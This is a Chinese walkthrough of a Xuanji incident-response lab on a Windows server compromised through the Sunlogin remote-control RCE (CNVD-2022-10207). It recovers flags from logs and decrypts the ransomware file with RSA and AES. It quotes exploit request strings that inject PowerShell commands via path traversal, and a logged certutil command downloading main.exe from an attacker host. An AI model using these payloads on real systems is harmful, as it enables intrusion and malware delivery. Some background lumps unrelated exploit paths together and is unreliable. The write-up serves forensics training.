玄机——第四章 windows实战-向日葵 wp_玄机邀请码

一、前言

题目链接：第四章 windows实战-向日葵

三连私信免费送玄机注册邀请码私信！！！看见就回！！注意私信！！

简单介绍一下向日葵；

向日葵远程连接软件是一款专为远程控制、远程管理和远程协助而设计的工具，适用于个人用户和企业用户。

功能特点

1. 远程桌面控制：

   • 允许用户通过网络远程控制另一台计算机的桌面，就像操作本地计算机一样。
   • 支持多屏显示、屏幕录像、键盘鼠标控制等功能。

2. 远程文件管理：

   • 用户可以在远程计算机之间传输文件，进行文件的上传、下载、删除、重命名等操作。
   • 提供文件夹同步功能，实现两台设备之间的文件自动同步。

3. 远程摄像头监控：

   • 可以通过远程查看连接到远程计算机的摄像头，实现远程监控功能。
   • 支持实时视频传输，查看监控画面。

4. 远程开关机：

   • 支持通过网络远程启动或关闭计算机，方便进行远程管理。
   • 可以设定定时开关机任务，实现自动化管理。

5. 远程协助：

   • 用户可以通过向日葵软件向他人提供远程技术支持和帮助。
   • 支持多人协作，共享屏幕，进行在线会议和培训。

6. 跨平台支持：

   • 向日葵支持多种操作系统，包括Windows、macOS、Linux、Android和iOS。
   • 用户可以通过不同设备进行远程连接和管理。

CNVD-2022-10207：向日葵RCE

漏洞背景

CNVD-2022-10207 是一个被发现的安全漏洞，允许未经授权的攻击者远程执行任意命令。

漏洞成因

该漏洞的成因通常涉及以下几个方面：

1. 输入验证缺陷：软件在处理用户输入时，未能正确验证和过滤特定的输入数据。
2. 路径处理不当：软件在处理文件路径时，可能存在目录遍历漏洞，允许攻击者访问任意文件。
3. 功能滥用：某些管理功能未受到足够的保护，可以被远程调用，执行敏感操作。

攻击过程

1. 发送特制请求：攻击者构造特定的 HTTP 请求，利用软件的输入验证缺陷或路径处理不当。
2. 远程执行命令：通过特制请求，攻击者可以执行任意系统命令或脚本。
3. 获取权限：成功利用漏洞后，攻击者可能获得系统的控制权，执行进一步的恶意操作。

影响

1. 远程命令执行：攻击者可以在目标系统上执行任意命令，导致系统被完全控制。
2. 数据泄露：攻击者可以访问和窃取系统中的敏感数据。
3. 进一步渗透：攻击者可以利用被控制的系统作为跳板，攻击网络内的其他设备。

具体实例

攻击者可能利用如下请求模式来触发漏洞：

目录遍历攻击：尝试访问和下载敏感文件。

/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
1

命令注入攻击：通过 URL 参数执行系统命令。

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
1

二、概览

简介

第四章 windows实战
Administrator xj@123456

题目；

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);
2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;
3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;
4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;
5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

三、参考文章

玄机——第四章 windows实战-向日葵

四、步骤（解析）

准备步骤#1.0

这里的靶机环境是windows，所以正常的我们使用远程桌面连接即可；

这里推荐大家使用“Microsoft“自带的远程桌面连接即可即可；（有一些笔记本/电脑是不自带的，不过已为大家准备好安装包）

123网盘下载；

https://www.123pan.com/s/q2J1jv-r8avd.html
提取码:0905

安装完成，进入主页，点击右上角“添加”–>“电脑”，接着启动靶机，输入靶机IP，点击“保存”，返回主页，点击连接，最后输入账号密码即可；

输入靶机IP，点击保存，返回主页；

输入账号密码，点击连接即可；

Administrator
xj@123456

最后连接成功；

步骤#1.1

通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);

解题思路

题目让我们提交黑客首次攻击成功的时间，那这题既然主要的是“向日葵”，而且桌面也有个“向日葵”，那肯定就是查日志分析了，那这里我们直接右键“向日葵”，接着打开文件位置就可以发现“log”目录，最后继续分析即可；

右键“打开文件所在位置”；

发现“log”目录，跟进分析；

那题目既然说是首次成功攻击，那肯定就从日志最早的时间查看分析起，如果这个日志没有发现，那就以此类推继续往下分析；

那打开日志，我们就主要分析以下特征，从而缩小范围进行查找；

特征

1. 异常登录记录：

   • 登录记录从未知或可疑IP地址。
   • 非常规时间段内的登录行为。

2. 频繁连接请求：

   • 短时间内的多次连接尝试，尤其是从相同IP地址。

3. 失败登录尝试：

   • 多次失败登录尝试，可能表示暴力破解尝试。

4. 新设备注册：

   • 是否有新设备绑定到你的向日葵账户。

5. 高频操作记录：

   • 短时间内的高频率操作记录。

那就主要根据这几个特征分析呗，日志往下翻一点就发现了关键点；

简单分析一下这里；

这里的日志记录，可以看出确实是黑客的在进行攻击尝试。这些日志显示了多个HTTP连接尝试，每个连接尝试都有不同的路径和参数，这些路径和参数是漏洞利用或恶意扫描。

1. 多个新连接

日志显示在同一时间段内，多个新连接尝试从同一IP地址（192.168.31.45）到目标IP地址（192.168.31.114），如下所示：

2024-03-21 19:54:56.229	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:58540-->192.168.31.114:49724
2024-03-21 19:54:56.244	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:58542-->192.168.31.114:49724
2024-03-21 19:54:56.244	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:58543-->192.168.31.114:49724
2024-03-21 19:54:56.245	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:58544-->192.168.31.114:49724
1
2
3
4

2. 可疑的HTTP路径和参数

每个连接尝试的路径和参数都显示了对特定资源的访问，这些资源路径和参数是已知漏洞利用的路径。例如：

1. /pages/createpage-entervariables.action?SpaceKey=x:

   • 描述：这个请求看起来像是针对某个网页应用框架的攻击尝试，可能是针对 Confluence 的命令注入。
   • 参数：
     • SpaceKey=x：攻击者尝试通过设置某个参数来利用该漏洞。
   • 目标：通过设置不安全的参数值，可能会导致服务器执行恶意代码或命令。

2. /CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en:

   • 描述：这是一个目录遍历攻击，它试图通过操纵路径来访问敏感文件。
   • 参数：
     • locale=../../../../../../../lib/password.properties%00en：攻击者使用了目录遍历 (../../../../../../../) 和空字符 (%00) 来访问本不应公开的 password.properties 文件。
   • 目标：读取或修改配置文件，可能包含敏感信息如密码。

3. /mailsms/s?func=ADMIN

   &dumpConfig=/:

   • 描述：这个请求试图利用一个功能（可能是一个管理功能）来获取系统配置信息。
   • 参数：
     • func=ADMIN:appState&dumpConfig=/：这个参数组合看起来像是试图调用一个管理命令 (ADMIN:appState) 并将配置信息导出。
   • 目标：获取系统配置和状态信息，可能包括敏感数据。

三个URL分析下来发现是尝试在利用CNVD-2022-10207：向日葵远程控制软件 RCE 漏洞。

CNVD-2022-10207 漏洞是一种远程命令执行漏洞，存在于向日葵远程控制软件中。攻击者可以通过特制的 HTTP 请求利用此漏洞，执行任意命令或代码。

攻击过程

1. 发送特制请求：攻击者发送精心构造的 HTTP 请求，利用应用程序中存在的漏洞。
2. 执行恶意命令：服务器在处理这些请求时，由于存在输入验证缺陷或路径处理不当，导致执行攻击者注入的恶意命令。
3. 获取权限：成功利用漏洞后，攻击者可以获得服务器上的远程控制权限，执行任意代码、修改数据或进一步渗透网络。

总结；

从这些日志记录中可以发现黑客利用了许多漏洞，这是一次次攻击尝试；

1. 同一IP地址的多个连接尝试：

   • 同一时间段内从192.168.31.45发起了多个连接，显示了明显的扫描或攻击行为。

2. 可疑的HTTP路径和参数：

   • 路径和参数显示了对系统特定资源的访问尝试，并且这些资源通常涉及漏洞利用（如路径遍历、配置文件读取等）。

所以开头这里的日志并没有发现黑客攻击成功，只是发现了黑客尝试利用各种漏洞进行攻击，那我们就继续往下分析，也是在日志的最底下发现了信息；

简单分析一下这里；

日志主要记录；

2024-03-26 10:16:25.570	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:16:25.570	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:16:25.585	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:64247-->192.168.31.114:49724
2024-03-26 10:16:25.585	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, version: HTTP/1.1
2024-03-26 10:16:25.585	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
2024-03-26 10:17:01.060	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:64284-->192.168.31.114:49724
2024-03-26 10:17:01.060	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:17:01.060	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:17:01.075	- Info  -	[service][TcpAcceptor] new acceptor 192.168.31.45:64285-->192.168.31.114:49724
2024-03-26 10:17:01.075	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, version: HTTP/1.1
2024-03-26 10:17:01.075	- Info  -	[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA
2024-03-26 10:17:20.423	- Info  -	[localserver] Not use proxy
1
2
3
4
5
6
7
8
9
10
11
12

分析

1. 请求路径和命令:
   • /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
   • /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd

这些路径和命令表明黑客正在尝试通过路径遍历攻击来访问并执行PowerShell命令，这些命令的目的是验证是否能够成功执行系统命令。whoami命令用于查看当前执行命令的用户，pwd命令用于查看当前工作目录。

• HTTP连接建立:

  • 日志中多次记录了从攻击者IP（192.168.31.45）到目标IP（192.168.31.114）的HTTP连接，表明攻击者正在反复尝试连接和执行命令。

• 攻击成功的迹象:

  • 虽然日志中没有显示命令的具体返回结果，但多次的连接请求和特定路径命令的使用表明攻击者在测试和确认命令执行的有效性。尤其是执行whoami和pwd命令，这通常是攻击者在初步获取访问权限后进行的操作，以确认他们的权限级别和工作目录。

总结；

日志记录表明，攻击者在2024年3月26日10:16:25通过路径遍历和命令注入成功执行了PowerShell命令。虽然没有具体的返回结果，但结合上下文，以下是关键点：

1. 路径遍历攻击成功：攻击者通过路径遍历攻击成功访问并执行了系统命令。
2. 权限确认：执行whoami和pwd命令表明攻击者正在确认其访问权限和工作目录，通常在获取成功的初步权限后进行。

题目让我们提交黑客首次攻击成功的具体时间，提交格式：flag{2028-03-26 08:11:25.123}；

至此；

flag{2024-03-26 10:16:25.585}
1

步骤#1.2

通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

解题思路

题目让我们提交黑客攻击的IP，我觉得这题应该放第一小题，题一我们黑客首次成功时间都找到了，那就顺便看看日志记录的IP即可，这题没啥好说的；

得到；

清一色的IP，直接提交即可；

flag{192.168.31.45}
1

步骤#1.3

通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

解题思路

题目让我们提交黑客托管的恶意程序IP，那我们还是继续在日志里面寻找一下特定的特征；

特征；

• 异常的外部连接：

  • 查找日志中所有与外部IP的连接记录，尤其是那些与已知可信IP不同的连接。

• 不常见的端口号：

  • 检查使用不常见端口号的连接，因为黑客通常使用非标准端口来隐藏他们的活动。

• 频繁的重复连接：

  • 关注短时间内频繁连接的IP地址，这可能表明尝试持续的攻击或数据传输。

• 可疑的请求路径：

  • 检查请求路径中包含敏感操作或看起来不正常的路径。

• 分析日志格式：

  • 确定日志中的外部连接记录格式，如连接源IP和目标IP的格式。

刚刚好，接着上题往下翻一点就发现了关键；

得到；

简单分析一下；

首先可以确认的是，这里的日志条目就显示了黑客从外部服务器下载并执行恶意程序的过程。

逐步分析；

1、新连接建立：

2024-03-26 10:31:07.538 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49328-->192.168.31.114:49724
1

• 说明：从IP 192.168.31.45 发起了到IP 192.168.31.114 的新连接。
• 端口号：源端口49328，目标端口49724。

2、HTTP连接建立：

2024-03-26 10:31:07.538 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49328, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
1

• 说明：通过HTTP协议建立连接，访问路径为/cgi-bin/rpc?action=verify-haras。
• 插件：cgi-bin。
• 会话：无。

3、新连接建立：

2024-03-26 10:31:07.576 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49329-->192.168.31.114:49724
1

• 说明：从IP 192.168.31.45 发起了到IP 192.168.31.114 的另一新连接。
• 端口号：源端口49329，目标端口49724。

4、HTTP连接建立并执行命令：

2024-03-26 10:31:07.576 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, version: HTTP/1.1
1

• 说明：通过HTTP协议建立连接，并执行命令/check?cmd=ping....windows/system32/WindowsPowerShell/v1.0/powershell.exe certutil -urlcache -split -f http://192.168.31.249/main.exe。
• 插件：check。
• 会话：sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1。

主要关键点；

• 恶意活动指示：

  • 路径遍历：/check?cmd=ping.... 是一种路径遍历尝试，试图访问系统中的powershell.exe。
  • 命令执行：使用 certutil 工具下载文件 main.exe。
  • 外部IP：下载源 http://192.168.31.249/main.exe 指向一个可能托管恶意程序的外部服务器。

• 恶意程序下载：

  • 工具使用：certutil 是一个合法的Windows工具，但在这里被用于下载恶意文件，这是一个常见的攻击模式。
  • 下载目标：目标文件 main.exe 可能是恶意程序。

总结；

这些日志条目显示了黑客尝试利用路径遍历和命令注入漏洞，通过 certutil 从外部服务器（192.168.31.249）下载并执行恶意程序 main.exe。这表明黑客的攻击成功了，且试图在目标系统上下载并运行恶意软件。

题目让我们提交黑客托管恶意程序 IP；

至此；

flag{192.168.31.249}
1

步骤#1.4

找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

解题思路

题目让我们提交黑客解密的DEC文件的MD5，那我们先在日志里尝试搜索一下文件名“DES”，看看有没有被定位到路径，但是发现没有这个文件，但是在差不多日志最底下发现了一个txt，那个txt里的内容是一个QQ号，抱着尝试的心情加了一下，最后在该群的“群文件”中发现了“DES”；（事后发现这是该平台的官方QQ群“玄机”）

未查到到文件“DEC”；

在日志最底下发现了TXT记录；

搜索QQ号，发现玄机官方群聊；（647224830）

加入该群，在群文件中发现了题目所说的"DEC"文件，但是提交格式为MD5，所以下载该文件进行MD5加密；

这里把文件进行MD5加密方法不唯一，这里暂且举两个例子，也就我们常用的两种，liunx以及window；

window中文件进行MD5加密；

这里的“DEC”文件，注意输入具体路径（或者在同一目录下唤起PowerShell）；

命令；

 certutil -hashfile .\DEC.pem MD5
1

得到；

Liunx中文件进行MD5加密；

命令；

md5sum DEC.pem 
1

得到；

至此；

flag{5ad8d202f80202f6d31e077fc9b0fc6b}
1

步骤#1.5

通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

解题思路

题目让我们解密桌面的文件将其中的flag进行提交，桌面确实有两个文件，我们简单分析一下；

两个文件；

右键记事本打开；

baoleiji.txt；

得到；

desktop.ini；

得到；

嘶，这两个文件让我想起了久违的老朋友“RSA”，结合上题得到的“DEC.pem”，那就正常RSA解密呗；

DEC.pem；

随便找一个RSA在线解密即可；

RSA在线解密

解密得到：NXVJSTQUAPGTXKSX

接着进行AES解密，随便找一个在线的即可；

AES在线解密

解密得到flag，iv偏移量是16个0；

得到；

@suanve
时间是连续的，年份只是人类虚构出来用于统计的单位，2024年第一天和2023年最后一天，
不会有任何本质区别。你的花呗，你的客户,你的体检报告，窗外的寒风，都不会因为这是新的一年，
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
1
2
3
4
5
6

至此；（友情提示：因为是RSA，所以每个人的附件不一样噢，要自己操作一遍才能得到自己的flag，提交正确噢~）

flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
1

拓展1.1

做兜做了，那还剩最后还有一个desktop.ini；（我们也解密一下吧）

解密得到：KBFKKYZKCBBUZKEC

AES解密；

最后；


[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183
1
2
3
4

简单分析一下；

这个是 desktop.ini 的配置文件的内容。desktop.ini 文件用于自定义 Windows 文件夹的显示属性。这段内容主要用于更改文件夹的图标和名称显示。以下是详细分析：

1. [.ShellClassInfo]:

   • 这是一个节标识符，表明接下来的内容属于 .ShellClassInfo 节。

2. LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769:

   • LocalizedResourceName：此参数用于指定文件夹的本地化名称。
   • @%SystemRoot%\system32\shell32.dll,-21769：指定从 shell32.dll 文件中提取资源字符串。%SystemRoot% 是一个环境变量，通常指向 C:\Windows 目录。-21769 是资源 ID，指向 shell32.dll 中的一个字符串资源，用于命名文件夹。

3. IconResource=%SystemRoot%\system32\imageres.dll,-183:

   • IconResource：此参数用于指定文件夹的图标。
   • %SystemRoot%\system32\imageres.dll,-183：指定从 imageres.dll 文件中提取图标资源。-183 是资源 ID，指向 imageres.dll 中的一个图标资源，用于更改文件夹的图标。

作用

• 文件夹名称：使用 shell32.dll 中的资源字符串来显示文件夹的本地化名称，这通常用于系统文件夹，以确保它们在不同语言的操作系统中显示正确的名称。
• 文件夹图标：使用 imageres.dll 中的资源图标来设置文件夹的图标，这通常用于系统文件夹或特定应用程序的文件夹，以提供统一和直观的图标显示。

示例

假设这个 desktop.ini 文件位于某个文件夹中，那么：

• 文件夹的显示名称将从 shell32.dll 中提取，显示为 -21769 资源 ID 对应的字符串（这可能是一个特定语言的名称）。
• 文件夹的图标将从 imageres.dll 中提取，显示为 -183 资源 ID 对应的图标。

总结

这段 desktop.ini 配置文件内容用于更改文件夹的显示名称和图标，提供更好的用户界面体验，尤其在系统和应用程序文件夹中常见。这些自定义设置通过引用系统 DLL 文件中的资源字符串和图标来实现。